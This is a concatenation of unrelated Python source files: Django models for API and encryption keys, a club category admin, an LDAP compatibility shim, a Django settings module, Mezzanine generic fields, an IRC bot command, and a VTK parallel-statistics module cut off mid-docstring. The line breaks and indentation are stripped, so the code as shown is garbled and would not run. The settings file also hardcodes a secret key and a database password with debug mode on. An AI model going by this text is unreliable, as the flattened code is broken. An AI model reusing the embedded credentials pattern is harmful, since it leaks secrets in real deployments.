import base64 from django.db import models from django.utils.crypto import get_random_string from cryptography.fernet import Fernet class BeamApiKey (models.Model): user = models.ForeignKey('account.User') beam = models.CharField(max_length=255) akey = models.CharField(max_length=255) generated = models.DateTimeField(auto_now=True) class Meta: unique_together = (('user', 'akey'),) verbose_name = 'Beam API Key' def __unicode__ (self): return self.beam @staticmethod def get_or_create (user, beam): try: return BeamApiKey.objects.get(user=user, beam=beam) except BeamApiKey.DoesNotExist: bkey = BeamApiKey(user=user, beam=beam, akey=BeamApiKey.gen_key()) bkey.save() return bkey @staticmethod def gen_key (): chars = 'abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*(-_=+)' akey = get_random_string(50, chars) akey = base64.urlsafe_b64encode(akey) return akey def regen (self): self.akey = BeamApiKey.gen_key() self.save() class EKey (models.Model): user = models.ForeignKey('account.User') beam = models.CharField(max_length=255) ekey = models.CharField(max_length=255, blank=True, null=True) created = models.DateTimeField(auto_now_add=True) class Meta: unique_together = (('user', 'ekey'),) verbose_name = 'Encryption Key' get_latest_by = "created" def __unicode__ (self): return self.beam @staticmethod def create (user, beam): key = Fernet.generate_key() ekey = EKey(user=user, beam=beam, ekey=key) ekey.save() return ekey
from django.db import models from django.contrib import admin from club.models.season import current_season class CategoryAdmin(admin.ModelAdmin): list_display = ('name', 'discipline', 'season', 'order') fieldsets = ((None, {'fields': ('name', 'discipline', 'season', 'prerequisite', 'target_public', 'rhythm', 'objective', 'order')}),) list_filter = ('discipline', 'season') class Category(models.Model): name = models.CharField(max_length=100) discipline = models.ForeignKey('Discipline', on_delete=models.CASCADE) season = models.ForeignKey('Season', on_delete=models.CASCADE) prerequisite = models.CharField(max_length=200) target_public = models.CharField(max_length=100) objective = models.TextField() rhythm = models.CharField(max_length=100, blank=True, null=True) order = models.IntegerField(blank=True, null=True) def __str__(self): return self.name def find_current_categories(discipline): season = current_season() return Category.objects.filter(season=season, discipline=discipline).order_by('order')
# # This file is part of Python-AD. Python-AD is free software that is made # available under the MIT license. Consult the file "LICENSE" that is # distributed together with this file for the exact licensing terms. # # Python-AD is copyright (c) 2007-2009 by the Python-AD authors. See the # file "AUTHORS" for a complete overview. import ldap import ldap.dn from distutils import version # ldap.str2dn has been removed in python-ldap >= 2.3.6. We now need to use # the version in ldap.dn. try: str2dn = ldap.dn.str2dn except AttributeError: str2dn = ldap.str2dn def disable_reverse_dns(): # Possibly add in a Kerberos minimum version check as well... return hasattr(ldap, 'OPT_X_SASL_NOCANON') if version.StrictVersion('2.4.0') <= version.StrictVersion(ldap.__version__): LDAP_CONTROL_PAGED_RESULTS = ldap.CONTROL_PAGEDRESULTS else: LDAP_CONTROL_PAGED_RESULTS = ldap.LDAP_CONTROL_PAGE_OID class SimplePagedResultsControl(ldap.controls.SimplePagedResultsControl): """ Python LDAP 2.4 and later breaks the API. This is an abstraction class so that we can handle either. http://planet.ergo-project.org/blog/jmeeuwen/2011/04/11/python-ldap-module-24-changes """ def __init__(self, page_size=0, cookie=''): if version.StrictVersion('2.4.0') <= version.StrictVersion(ldap.__version__): ldap.controls.SimplePagedResultsControl.__init__( self, size=page_size, cookie=cookie ) else: ldap.controls.SimplePagedResultsControl.__init__( self, LDAP_CONTROL_PAGED_RESULTS, critical, (page_size, '') ) def cookie(self): if version.StrictVersion('2.4.0') <= version.StrictVersion(ldap.__version__): return self.cookie else: return self.controlValue[1] def size(self): if version.StrictVersion('2.4.0') <= version.StrictVersion(ldap.__version__): return self.size else: return self.controlValue[0]
""" Django settings for freelance project. Generated by 'django-admin startproject' using Django 1.8.2. For more information on this file, see https://docs.djangoproject.com/en/1.8/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/1.8/ref/settings/ """ # Build paths inside the project like this: os.path.join(BASE_DIR, ...) import os BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = '4dxkq6oc*k+g=imdt_w-$d0!epc2lw%_-l6otq=u42kydg446$' # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True ALLOWED_HOSTS = [] # Application definition INSTALLED_APPS = ( 'flat', 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'clients', 'invoices', 'items', 'crispy_forms', ) MIDDLEWARE_CLASSES = ( 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.auth.middleware.SessionAuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', 'django.middleware.security.SecurityMiddleware', ) ROOT_URLCONF = 'freelance.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [ 'templates', ], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] CRISPY_TEMPLATE_PACK = 'bootstrap3' WSGI_APPLICATION = 'freelance.wsgi.application' # Database # https://docs.djangoproject.com/en/1.8/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.mysql', 'NAME': 'freelance', 'USER': 'freelanceadmin', 'PASSWORD': 'FREE123', 'HOST': 'localhost', } } # Internationalization # https://docs.djangoproject.com/en/1.8/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/1.8/howto/static-files/ STATIC_URL = '/static/'
from copy import copy from django.conf import settings from django.contrib.contenttypes.generic import GenericRelation from django.core.exceptions import ImproperlyConfigured from django.db.models import get_model, IntegerField, CharField, FloatField from django.db.models.signals import post_save, post_delete class BaseGenericRelation(GenericRelation): """ Extends ``GenericRelation`` to: - Add a consistent default value for ``object_id_field`` and check for a ``related_model`` attribute which can be defined on subclasses as a default for the ``to`` argument. - Add one or more custom fields to the model that the relation field is applied to, and then call a ``related_items_changed`` method each time related items are saved or deleted, so that a calculated value can be stored against the custom fields since aggregates aren't available for GenericRelation instances. """ # Mapping of field names to model fields that will be added. fields = {} def __init__(self, *args, **kwargs): """ Set up some defaults and check for a ``related_model`` attribute for the ``to`` argument. """ self.frozen_by_south = kwargs.pop("frozen_by_south", False) kwargs.setdefault("object_id_field", "object_pk") to = getattr(self, "related_model", None) if to: kwargs.setdefault("to", to) super(BaseGenericRelation, self).__init__(*args, **kwargs) def db_type(self, connection): """ South expects this to return a string for initial migrations against MySQL, to check for text or geometery columns. These generic fields are neither of those, but returning an empty string here at least allows migrations to run successfully. See http://south.aeracode.org/ticket/1204 """ if self.frozen_by_south: return "" return None def contribute_to_class(self, cls, name): """ Add each of the names and fields in the ``fields`` attribute to the model the relationship field is applied to, and set up the related item save and delete signals for calling ``related_items_changed``. """ for field in cls._meta.many_to_many: if isinstance(field, self.__class__): e = "Multiple %s fields are not supported (%s.%s, %s.%s)" % ( self.__class__.__name__, cls.__name__, cls.__name__, name, field.name) raise ImproperlyConfigured(e) self.related_field_name = name super(BaseGenericRelation, self).contribute_to_class(cls, name) # Not applicable to abstract classes, and in fact will break. if not cls._meta.abstract and not self.frozen_by_south: for (name_string, field) in self.fields.items(): if "%s" in name_string: name_string = name_string % name if not field.verbose_name: field.verbose_name = self.verbose_name cls.add_to_class(name_string, copy(field)) # Add a getter function to the model we can use to retrieve # the field/manager by name. getter_name = "get_%s_name" % self.__class__.__name__.lower() cls.add_to_class(getter_name, lambda self: name) # For some unknown reason the signal won't be triggered # if given a sender arg, particularly when running # Cartridge with the field RichTextPage.keywords - so # instead of specifying self.rel.to as the sender, we # check for it inside the signal itself. post_save.connect(self._related_items_changed) post_delete.connect(self._related_items_changed) def _related_items_changed(self, **kwargs): """ Ensure that the given related item is actually for the model this field applies to, and pass the instance to the real ``related_items_changed`` handler. """ # Manually check that the instance matches the relation, # since we don't specify a sender for the signal. try: to = self.rel.to if isinstance(to, basestring): to = get_model(*to.split(".", 1)) if not isinstance(kwargs["instance"], to): raise TypeError except (TypeError, ValueError): return for_model = kwargs["instance"].content_type.model_class() if issubclass(for_model, self.model): instance_id = kwargs["instance"].object_pk try: instance = for_model.objects.get(id=instance_id) except self.model.DoesNotExist: # Instance itself was deleted - signals are irrelevant. return if hasattr(instance, "get_content_model"): instance = instance.get_content_model() related_manager = getattr(instance, self.related_field_name) self.related_items_changed(instance, related_manager) def related_items_changed(self, instance, related_manager): """ Can be implemented by subclasses - called whenever the state of related items change, eg they're saved or deleted. The instance for this field and the related manager for the field are passed as arguments. """ pass class CommentsField(BaseGenericRelation): """ Stores the number of comments against the ``COMMENTS_FIELD_NAME_count`` field when a comment is saved or deleted. """ related_model = "generic.ThreadedComment" fields = {"%s_count": IntegerField(editable=False, default=0)} def related_items_changed(self, instance, related_manager): """ Stores the number of comments. A custom ``count_filter`` queryset gets checked for, allowing managers to implement custom count logic. """ try: count = related_manager.count_queryset() except AttributeError: count = related_manager.count() count_field_name = self.fields.keys()[0] % self.related_field_name setattr(instance, count_field_name, count) instance.save() class KeywordsField(BaseGenericRelation): """ Stores the keywords as a single string into the ``KEYWORDS_FIELD_NAME_string`` field for convenient access when searching. """ related_model = "generic.AssignedKeyword" fields = {"%s_string": CharField(editable=False, blank=True, max_length=500)} def __init__(self, *args, **kwargs): """ Mark the field as editable so that it can be specified in admin class fieldsets and pass validation, and also so that it shows up in the admin form. """ super(KeywordsField, self).__init__(*args, **kwargs) self.editable = True def formfield(self, **kwargs): """ Provide the custom form widget for the admin, since there isn't a form field mapped to ``GenericRelation`` model fields. """ from mezzanine.generic.forms import KeywordsWidget kwargs["widget"] = KeywordsWidget return super(KeywordsField, self).formfield(**kwargs) def save_form_data(self, instance, data): """ The ``KeywordsWidget`` field will return data as a string of comma separated IDs for the ``Keyword`` model - convert these into actual ``AssignedKeyword`` instances. Also delete ``Keyword`` instances if their last related ``AssignedKeyword`` instance is being removed. """ from mezzanine.generic.models import AssignedKeyword, Keyword related_manager = getattr(instance, self.name) # Get a list of Keyword IDs being removed. old_ids = [str(a.keyword_id) for a in related_manager.all()] new_ids = data.split(",") removed_ids = set(old_ids) - set(new_ids) # Remove current AssignedKeyword instances. related_manager.all().delete() # Convert the data into AssignedKeyword instances. if data: data = [AssignedKeyword(keyword_id=i) for i in new_ids] # Remove Keyword instances than no longer have a # related AssignedKeyword instance. existing = AssignedKeyword.objects.filter(keyword__id__in=removed_ids) existing_ids = set([str(a.keyword_id) for a in existing]) unused_ids = removed_ids - existing_ids Keyword.objects.filter(id__in=unused_ids).delete() super(KeywordsField, self).save_form_data(instance, data) def contribute_to_class(self, cls, name): """ Swap out any reference to ``KeywordsField`` with the ``KEYWORDS_FIELD_string`` field in ``search_fields``. """ super(KeywordsField, self).contribute_to_class(cls, name) string_field_name = self.fields.keys()[0] % self.related_field_name if hasattr(cls, "search_fields") and name in cls.search_fields: try: weight = cls.search_fields[name] except TypeError: # search_fields is a sequence. index = cls.search_fields.index(name) search_fields_type = type(cls.search_fields) cls.search_fields = list(cls.search_fields) cls.search_fields[index] = string_field_name cls.search_fields = search_fields_type(cls.search_fields) else: del cls.search_fields[name] cls.search_fields[string_field_name] = weight def related_items_changed(self, instance, related_manager): """ Stores the keywords as a single string for searching. """ assigned = related_manager.select_related("keyword") keywords = " ".join([unicode(a.keyword) for a in assigned]) string_field_name = self.fields.keys()[0] % self.related_field_name if getattr(instance, string_field_name) != keywords: setattr(instance, string_field_name, keywords) instance.save() class RatingField(BaseGenericRelation): """ Stores the rating count and average against the ``RATING_FIELD_NAME_count`` and ``RATING_FIELD_NAME_average`` fields when a rating is saved or deleted. """ related_model = "generic.Rating" fields = {"%s_count": IntegerField(default=0, editable=False), "%s_sum": IntegerField(default=0, editable=False), "%s_average": FloatField(default=0, editable=False)} def related_items_changed(self, instance, related_manager): """ Calculates and saves the average rating. """ ratings = [r.value for r in related_manager.all()] count = len(ratings) _sum = sum(ratings) average = _sum / float(count) if count > 0 else 0 setattr(instance, "%s_count" % self.related_field_name, count) setattr(instance, "%s_sum" % self.related_field_name, _sum) setattr(instance, "%s_average" % self.related_field_name, average) instance.save() # South requires custom fields to be given "rules". # See http://south.aeracode.org/docs/customfields.html if "south" in settings.INSTALLED_APPS: try: from south.modelsinspector import add_introspection_rules add_introspection_rules(rules=[((BaseGenericRelation,), [], {"frozen_by_south": [True, {"is_value": True}]})], patterns=["mezzanine\.generic\.fields\."]) except ImportError: pass
# Copyright (C) 2013-2015 Samuel Damashek, Peter Foley, James Forcier, Srijay Kasturi, Reed Koser, Christopher Reffett, and Fox Wilson # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. from time import time from datetime import timedelta from ..helpers.command import Command @Command('uptime', ['handler']) def cmd(send, _, args): """Shows the bot's uptime. Syntax: {command} """ curr = time() uptime = args['handler'].uptime starttime = curr - uptime['start'] reloaded = curr - uptime['reloaded'] send("Time since start: %s" % timedelta(seconds=starttime)) send("Time since reload: %s" % timedelta(seconds=reloaded))
""" This module provides a number of algorithms that can be used with the dataset classes defined in the dataset_adapter module. See the documentation of the dataset_adapter for some examples. These algorithms work in serial and in parallel as long as the data is partitioned according to VTK data parallel execution guidelines. For details, see the documentation of individual algorithms. """ from __future__ import absolute_import import sys try: import numpy except ImportError: raise RuntimeError("This module depends on the numpy module. Please make\ sure that it is installed properly.") from . import dataset_adapter as dsa from . import internal_algorithms as algs import itertools try: from vtk.vtkParallelCore import vtkMultiProcessController from vtk.vtkParallelMPI4Py import vtkMPI4PyCommunicator except ImportError: vtkMultiProcessController = None vtkMPI4PyCommunicator = None if sys.hexversion < 0x03000000: izip = itertools.izip else: izip = zip def _apply_func2(func, array, args): """Apply a function to each member of a VTKCompositeDataArray. Returns a list of arrays. Note that this function is mainly for internal use by this module.""" if array is dsa.NoneArray: return [] res = [] for a in array.Arrays: if a is dsa.NoneArray: res.append(dsa.NoneArray) else: res.append(func(a, *args)) return res def apply_ufunc(func, array, args=()): """Apply a function to each member of a VTKCompositeDataArray. VTKArray and numpy arrays are also supported.""" if array is dsa.NoneArray: return dsa.NoneArray elif type(array) == dsa.VTKCompositeDataArray: return dsa.VTKCompositeDataArray(_apply_func2(func, array, args), dataset = array.DataSet) else: return func(array) def _make_ufunc(ufunc): """ Given a ufunc, creates a closure that applies it to each member of a VTKCompositeDataArray. Note that this function is mainly for internal use by this module.""" def new_ufunc(array): return apply_ufunc(ufunc, array, ()) return new_ufunc def apply_dfunc(dfunc, array1, val2): """Apply a two argument function to each member of a VTKCompositeDataArray and another argument The second argument can be a VTKCompositeDataArray, in which case a one-to-one match between arrays is assumed. Otherwise, the function is applied to the composite array with the second argument repeated. VTKArray and numpy arrays are also supported.""" if type(array1) == dsa.VTKCompositeDataArray and type(val2) == dsa.VTKCompositeDataArray: res = [] for a1, a2 in izip(array1.Arrays, val2.Arrays): if a1 is dsa.NoneArray or a2 is dsa.NoneArray: res.append(dsa.NoneArray) else: l = dsa.reshape_append_ones(a1, a2) res.append(dfunc(l[0], l[1])) return dsa.VTKCompositeDataArray(res, dataset = array1.DataSet) elif type(array1) == dsa.VTKCompositeDataArray: res = [] for a in array1.Arrays : if a is dsa.NoneArray: res.append(dsa.NoneArray) else: l = dsa.reshape_append_ones(a, val2) res.append(dfunc(l[0], l[1])) return dsa.VTKCompositeDataArray(res, dataset = array1.DataSet) elif array1 is dsa.NoneArray: return dsa.NoneArray else: l = dsa.reshape_append_ones(array1, val2) return dfunc(l[0], l[1]) def _make_dfunc(dfunc): """ Given a function that requires two arguments, creates a closure that applies it to each member of a VTKCompositeDataArray. Note that this function is mainly for internal use by this module.""" def new_dfunc(array1, val2): return apply_dfunc(dfunc, array1, val2) return new_dfunc def _make_dsfunc(dsfunc): """ Given a function that requires two arguments (one array, one dataset), creates a closure that applies it to each member of a VTKCompositeDataArray. Note that this function is mainly for internal use by this module.""" def new_dsfunc(array, ds=None): if type(array) == dsa.VTKCompositeDataArray: res = [] for a in array.Arrays: if a is dsa.NoneArray: res.append(dsa.NoneArray) else: res.append(dsfunc(a, ds)) return dsa.VTKCompositeDataArray(res, dataset = array.DataSet) elif array is dsa.NoneArray: return dsa.NoneArray else: return dsfunc(array, ds) return new_dsfunc def _make_dsfunc2(dsfunc): """ Given a function that requires a dataset, creates a closure that applies it to each member of a VTKCompositeDataArray. Note that this function is mainly for internal use by this module.""" def new_dsfunc2(ds): if type(ds) == dsa.CompositeDataSet: res = [] for dataset in ds: res.append(dsfunc(dataset)) return dsa.VTKCompositeDataArray(res, dataset = ds) else: return dsfunc(ds) return new_dsfunc2 def _lookup_mpi_type(ntype): from mpi4py import MPI if ntype == numpy.bool: typecode = 'b' else: typecode = numpy.dtype(ntype).char return MPI.__TypeDict__[typecode] def _reduce_dims(array, comm): from mpi4py import MPI dims = numpy.array([0, 0], dtype=numpy.int32) if array is not dsa.NoneArray: shp = shape(array) if len(shp) == 0: dims = numpy.array([1, 0], dtype=numpy.int32) elif len(shp) == 1: dims = numpy.array([shp[0], 0], dtype=numpy.int32) else: dims = numpy.array(shp, dtype=numpy.int32) max_dims = numpy.array(dims, dtype=numpy.int32) mpitype = _lookup_mpi_type(numpy.int32) comm.Allreduce([dims, mpitype], [max_dims, mpitype], MPI.MAX) if max_dims[1] == 0: max_dims = numpy.array((max_dims[0],)) size = max_dims[0] else: size = max_dims[0]*max_dims[1] if max_dims[0] == 1: max_dims = 1 return (max_dims, size) def _global_func(impl, array, axis, controller): if type(array) == dsa.VTKCompositeDataArray: if axis is None or axis == 0: res = impl.serial_composite(array, axis) else: res = apply_ufunc(impl.op(), array, (axis,)) else: res = impl.op()(array, axis) if res is not dsa.NoneArray: res = res.astype(numpy.float64) if axis is None or axis == 0: if controller is None and vtkMultiProcessController is not None: controller = vtkMultiProcessController.GetGlobalController() if controller and controller.IsA("vtkMPIController"): from mpi4py import MPI comm = vtkMPI4PyCommunicator.ConvertToPython(controller.GetCommunicator()) max_dims, size = _reduce_dims(res, comm) # All NoneArrays if size == 0: return dsa.NoneArray; if res is dsa.NoneArray: if max_dims is 1: # Weird trick to make the array look like a scalar max_dims = () res = numpy.empty(max_dims) res.fill(impl.default()) res_recv = numpy.array(res) mpi_type = _lookup_mpi_type(res.dtype) comm.Allreduce([res, mpi_type], [res_recv, mpi_type], impl.mpi_op()) if array is dsa.NoneArray: return dsa.NoneArray res = res_recv return res def sum(array, axis=None, controller=None): """Returns the sum of all values along a particular axis (dimension). Given an array of m tuples and n components: * Default is to return the sum of all values in an array. * axis=0: Sum values of all components and return a one tuple, n-component array. * axis=1: Sum values of all components of each tuple and return an m-tuple, 1-component array. When called in parallel, this function will sum across processes when a controller argument is passed or the global controller is defined. To disable parallel summing when running in parallel, pass a dummy controller as follows: sum(array, controller=vtk.vtkDummyController()). """ class SumImpl: def op(self): return algs.sum def mpi_op(self): from mpi4py import MPI return MPI.SUM def serial_composite(self, array, axis): res = None arrays = array.Arrays for a in arrays: if a is not dsa.NoneArray: if res is None: res = algs.sum(a, axis).astype(numpy.float64) else: res += algs.sum(a, axis) return res def default(self): return numpy.float64(0) return _global_func(SumImpl(), array, axis, controller) def max(array, axis=None, controller=None): """Returns the max of all values along a particular axis (dimension). Given an array of m tuples and n components: * Default is to return the max of all values in an array. * axis=0: Return the max values of all tuples and return a one tuple, n-component array. * axis=1: Return the max values of all components of each tuple and return an m-tuple, 1-component array. When called in parallel, this function will compute the max across processes when a controller argument is passed or the global controller is defined. To disable parallel summing when running in parallel, pass a dummy controller as follows: max(array, controller=vtk.vtkDummyController()). """ class MaxImpl: def op(self): return algs.max def mpi_op(self): from mpi4py import MPI return MPI.MAX def serial_composite(self, array, axis): res = _apply_func2(algs.max, array, (axis,)) clean_list = [] for a in res: if a is not dsa.NoneArray: clean_list.append(a) if clean_list is []: return None return algs.max(clean_list, axis=0).astype(numpy.float64) def default(self): return numpy.finfo(numpy.float64).min return _global_func(MaxImpl(), array, axis, controller) def min(array, axis=None, controller=None): """Returns the min of all values along a particular axis (dimension). Given an array of m tuples and n components: * Default is to return the min of all values in an array. * axis=0: Return the min values of all tuples and return a one tuple, n-component array. * axis=1: Return the min values of all components of each tuple and return an m-tuple, 1-component array. When called in parallel, this function will compute the min across processes when a controller argument is passed or the global controller is defined. To disable parallel summing when running in parallel, pass a dummy controller as follows: min(array, controller=vtk.vtkDummyController()). """ class MinImpl: def op(self): return algs.min def mpi_op(self): from mpi4py import MPI return MPI.MIN def serial_composite(self, array, axis): res = _apply_func2(algs.min, array, (axis,)) clean_list = [] for a in res: if a is not dsa.NoneArray: clean_list.append(a) if clean_list is []: return None return algs.min(clean_list, axis=0).astype(numpy.float64) def default(self): return numpy.finfo(numpy.float64).max return _global_func(MinImpl(), array, axis, controller) def _global_per_block(impl, array, axis=None, controller=None): if axis > 0: return impl.op()(array, axis=axis, controller=controller) try: dataset = array.DataSet except AttributeError: dataset = None t = type(array) if t == dsa.VTKArray or t == numpy.ndarray: from vtk.vtkCommonDataModel import vtkMultiBlockDataSet array = dsa.VTKCompositeDataArray([array]) ds = vtkMultiBlockDataSet() ds.SetBlock(0, dataset.VTKObject) dataset = ds results = _apply_func2(impl.op2(), array, (axis,)) if controller is None and vtkMultiProcessController is not None: controller = vtkMultiProcessController.GetGlobalController() if controller and controller.IsA("vtkMPIController"): from mpi4py import MPI comm = vtkMPI4PyCommunicator.ConvertToPython(controller.GetCommunicator()) # First determine the number of components to use # for reduction res = dsa.NoneArray for res in results: if res is not dsa.NoneArray: break max_dims, size = _reduce_dims(res, comm) # All NoneArrays if size == 0: return dsa.NoneArray; # Next determine the max id to use for reduction # operations # Get all ids from dataset, including empty ones. ids = [] lmax_id = numpy.int32(0) if dataset is not None: it = dataset.NewIterator() it.UnRegister(None) it.SetSkipEmptyNodes(False) while not it.IsDoneWithTraversal(): _id = it.GetCurrentFlatIndex() lmax_id = numpy.max((lmax_id, _id)).astype(numpy.int32) if it.GetCurrentDataObject() is not None: ids.append(_id) it.GoToNextItem() max_id = numpy.array(0, dtype=numpy.int32) mpitype = _lookup_mpi_type(numpy.int32) comm.Allreduce([lmax_id, mpitype], [max_id, mpitype], MPI.MAX) has_ids = numpy.zeros(max_id+1, dtype=numpy.int32) for _id in ids: has_ids[_id] = 1 id_count = numpy.array(has_ids) comm.Allreduce([has_ids, mpitype], [id_count, mpitype], MPI.SUM) if numpy.all(id_count <= 1): return dsa.VTKCompositeDataArray(results, dataset=dataset) # Now that we know which blocks are shared by more than # 1 rank. The ones that have a count of 2 or more. reduce_ids = [] for _id in xrange(len(id_count)): if id_count[_id] > 1: reduce_ids.append(_id) to_reduce = len(reduce_ids) # If not block is shared, short circuit. No need to # communicate any more. if to_reduce == 0: return dsa.VTKCompositeDataArray(results, dataset=dataset) # Create the local array that will be used for # reduction. Set it to a value that won't effect # the reduction. lresults = numpy.empty(size*to_reduce) lresults.fill(impl.default()) # Just get non-empty ids. Doing this again in case # the traversal above results in a different order. # We need the same order since we'll use izip below. if dataset is not None: it = dataset.NewIterator() it.UnRegister(None) ids = [] while not it.IsDoneWithTraversal(): ids.append(it.GetCurrentFlatIndex()) it.GoToNextItem() # Fill the local array with available values. for _id, _res in izip(ids, results): success = True try: loc = reduce_ids.index(_id) except ValueError: success = False if success: if _res is not dsa.NoneArray: lresults[loc*size:(loc+1)*size] = _res.flatten() # Now do the MPI reduction. rresults = numpy.array(lresults) mpitype = _lookup_mpi_type(numpy.double) comm.Allreduce([lresults, mpitype], [rresults, mpitype], impl.mpi_op()) if array is dsa.NoneArray: return dsa.NoneArray # Fill in the reduced values. for i in xrange(to_reduce): _id = reduce_ids[i] success = True try: loc = ids.index(_id) except ValueError: success = False if success: if size == 1: results[loc] = dsa.VTKArray(rresults[i]) else: results[loc] = rresults[i*size:(i+1)*size].reshape(max_dims) return dsa.VTKCompositeDataArray(results, dataset=dataset) def sum_per_block(array, axis=None, controller=None): """Returns the sum of all values along a particular axis (dimension) for each block of an VTKCompositeDataArray. Given an array of m tuples and n components: * Default is to return the sum of all values in an array. * axis=0: Sum values of all components and return a one tuple, n-component array. * axis=1: Sum values of all components of each tuple and return an m-tuple, 1-component array. When called in parallel, this function will sum across processes when a controller argument is passed or the global controller is defined. To disable parallel summing when running in parallel, pass a dummy controller as follows: sum_per_block(array, controller=vtk.vtkDummyController()). """ class SumPerBlockImpl: def op(self): return sum def op2(self): return algs.sum def mpi_op(self): from mpi4py import MPI return MPI.SUM def default(self): return numpy.float64(0) return _global_per_block(SumPerBlockImpl(), array, axis, controller) def count_per_block(array, axis=None, controller=None): """Return the number of elements of each block in a VTKCompositeDataArray along an axis. - if axis is None, the number of all elements (ntuples * ncomponents) is returned. - if axis is 0, the number of tuples is returned. """ if axis > 0: raise ValueError("Only axis=None and axis=0 are supported for count") class CountPerBlockImpl: def op(self): return _array_count def op2(self): return _local_array_count def mpi_op(self): from mpi4py import MPI return MPI.SUM def default(self): return numpy.float64(0) return _global_per_block(CountPerBlockImpl(), array, axis, controller) def mean_per_block(array, axis=None, controller=None): """Returns the mean of all values along a particular axis (dimension) for each block of a VTKCompositeDataArray. Given an array of m tuples and n components: * Default is to return the mean of all values in an array. * axis=0: Return the mean values of all components and return a one tuple, n-component array. * axis=1: Return the mean values of all components of each tuple and return an m-tuple, 1-component array. When called in parallel, this function will compute the mean across processes when a controller argument is passed or the global controller is defined. To disable parallel summing when running in parallel, pass a dummy controller as follows: mean(array, controller=vtk.vtkDummyController()). """ if axis is None or axis == 0: return sum_per_block(array, axis, controller) / count_per_block(array, axis, controller) else: return sum(array, axis, controller) def max_per_block(array, axis=None, controller=None): """Returns the max of all values along a particular axis (dimension) for each block of a VTKCompositeDataArray. Given an array of m tuples and n components: * Default is to return the max of all values in an array. * axis=0: Return the max values of all components and return a one tuple, n-component array. * axis=1: Return the max values of all components of each tuple and return an m-tuple, 1-component array. When called in parallel, this function will compute the max across processes when a controller argument is passed or the global controller is defined. To disable parallel summing when running in parallel, pass a dummy controller as follows: max_per_block(array, controller=vtk.vtkDummyController()). """ class MaxPerBlockImpl: def op(self): return max def op2(self): return algs.max def mpi_op(self): from mpi4py import MPI return MPI.MAX def default(self): return numpy.finfo(numpy.float64).min return _global_per_block(MaxPerBlockImpl(), array, axis, controller) def min_per_block(array, axis=None, controller=None): """Returns the min of all values along a particular axis (dimension) for each block of a VTKCompositeDataArray. Given an array of m tuples and n components: * Default is to return the min of all values in an array. * axis=0: Return the min values of all components and return a one tuple, n-component array. * axis=1: Return the min values of all components of each tuple and return an m-tuple, 1-component array. When called in parallel, this function will compute the min across processes when a controller argument is passed or the global controller is defined. To disable parallel summing when running in parallel, pass a dummy controller as follows: min_per_block(array, controller=vtk.vtkDummyController()). """ class MinPerBlockImpl: def op(self): return min def op2(self): return algs.min def mpi_op(self): from mpi4py import MPI return MPI.MIN def default(self): return numpy.finfo(numpy.float64).max return _global_per_block(MinPerBlockImpl(), array, axis, controller) def all(array, axis=None, controller=None): """Returns True if all values of an array evaluate to True, returns False otherwise. This is useful to check if all values of an array match a certain condition such as: algorithms.all(array > 5) """ class MinImpl: def op(self): return algs.all def mpi_op(self): from mpi4py import MPI return MPI.LAND def serial_composite(self, array, axis): res = _apply_func2(algs.all, array, (axis,)) clean_list = [] for a in res: if a is not dsa.NoneArray: clean_list.append(a) if clean_list is []: return None return algs.all(clean_list, axis=0) def default(self, max_comps): return numpy.ones(max_comps, dtype=numpy.bool) return _global_func(MinImpl(), array, axis, controller) def _local_array_count(array, axis): if array is dsa.NoneArray: return numpy.int64(0) elif axis is None: return numpy.int64(array.size) else: return numpy.int64(shape(array)[0]) def _array_count(array, axis, controller): if array is dsa.NoneArray: size = numpy.int64(0) elif axis is None: size = numpy.int64(array.size) else: size = numpy.int64(shape(array)[0]) if controller is None and vtkMultiProcessController is not None: controller = vtkMultiProcessController.GetGlobalController() if controller and controller.IsA("vtkMPIController"): from mpi4py import MPI comm = vtkMPI4PyCommunicator.ConvertToPython(controller.GetCommunicator()) total_size = numpy.array(size, dtype=numpy.int64) mpitype = _lookup_mpi_type(numpy.int64) comm.Allreduce([size, mpitype], [total_size, mpitype], MPI.SUM) size = total_size return size def mean(array, axis=None, controller=None, size=None): """Returns the mean of all values along a particular axis (dimension). Given an array of m tuples and n components: * Default is to return the mean of all values in an array. * axis=0: Return the mean values of all components and return a one tuple, n-component array. * axis=1: Return the mean values of all components of each tuple and return an m-tuple, 1-component array. When called in parallel, this function will compute the mean across processes when a controller argument is passed or the global controller is defined. To disable parallel summing when running in parallel, pass a dummy controller as follows: mean(array, controller=vtk.vtkDummyController()). """ if axis is None or axis == 0: if size is None: size = _array_count(array, axis, controller) return sum(array, axis) / size else: if type(array) == dsa.VTKCompositeDataArray: return apply_ufunc(algs.mean, array, (axis,)) else: return algs.mean(array, axis) def var(array, axis=None, controller=None): """Returns the variance of all values along a particular axis (dimension). Given an array of m tuples and n components: * Default is to return the variance of all values in an array. * axis=0: Return the variance values of all components and return a one tuple, n-component array. * axis=1: Return the variance values of all 